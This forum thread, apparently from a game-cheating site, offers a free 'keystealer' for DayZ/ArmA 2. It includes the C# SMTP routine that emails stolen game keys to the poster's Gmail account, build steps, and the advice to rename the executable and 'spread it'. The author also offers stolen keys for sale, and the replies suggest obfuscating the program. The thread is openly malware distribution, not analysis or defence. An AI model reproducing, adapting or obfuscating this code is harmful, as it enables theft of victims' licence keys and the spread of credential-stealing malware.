Thread: DayZ Email Keystealer Script

DayZ Email Keystealer Script

This is a simple keystealer that will send the keys to your email account. It's free, so don't expect too much from it . I have no idea how to make a builder for a program, so you're going to have to edit the source code yourself if you want to use this.

I'm going to try to make this easy to follow because most people that know what they're doing have already made their own keystealer.

You need 2 email accounts for this. I personally use gmail as the sender account because they won't lock/delete the account.
    You need visual studio (or possibly another IDE) which can be found for free here:
    http://go.microsoft.com/?linkid=9709939

Here's the project files: Keystealer.rar

Extract the program files with winrar and open 2.sln.
    In the solution explorer to the right, double click on Form1.cs and then double click on the image of the program in the main window.
    Scroll down to where it says
    Code:
    MailMessage mail = new MailMessage();
                        SmtpClient smtpServer = new SmtpClient("smtp.gmail.com"); // ----If you're not using google as a sender,
                                                                                  //     change this accordingly.
                        mail.From = new MailAddress("----ENTER THE SENDER EMAIL ADRESS HERE----");
                        mail.To.Add("----ENTER YOUR RECEIVING EMAIL ADRESS HERE----");
                        mail.Subject = ("ArmA 2: OA");
                        mail.Body = label10.Text;
                        smtpServer.Port = 587; //----If you're not using google, make sure that this is the right port for the smtp server
                        smtpServer.Credentials = new System.Net.NetworkCredential("----ENTER THE SENDER EMAIL ADRESS HERE----", "----ENTER THE SENDER PASSWORD HERE----");
                        smtpServer.EnableSsl = true;
                        smtpServer.Send(mail);
    Fill in the info for the sender and receiving email adresses.
    Press F6 to build the solution.
    Go to the folder the files are stored in and go to "Keystealer\WindowsFormsApplication1\bin\Debug "
    Rename WindowsFormsApplication1.exe to whatever you want and then spread it!

I'm not sure if this is required: https://www.virustotal.com/en/file/4...is/1365962040/

On a side note, I have 5 keys that have been unbanned for over a week if anyone would be interested in purchasing them.
    Last edited by quantum; 04-14-2013 at 03:40 PM.

File appears safe
    //approved

The Best VPN!
    VVV Click Below VVV

AFAIK, they can't get anything important because the only password in the program is for the sender account.

Quote Originally Posted by Dolfin View Post
    AFAIK, they can't get anything important because the only password in the program is for the sender account.
    Sent messages box ._.

Just obfuscate the program and they can't get it as long as you're using SSL

The Best VPN!
    VVV Click Below VVV

Quote Originally Posted by Tynted View Post
    Sent messages box ._.

Just obfuscate the program and they can't get it as long as you're using SSL
    Do you know of any free obfuscators? I've tried confuser but it breaks the program.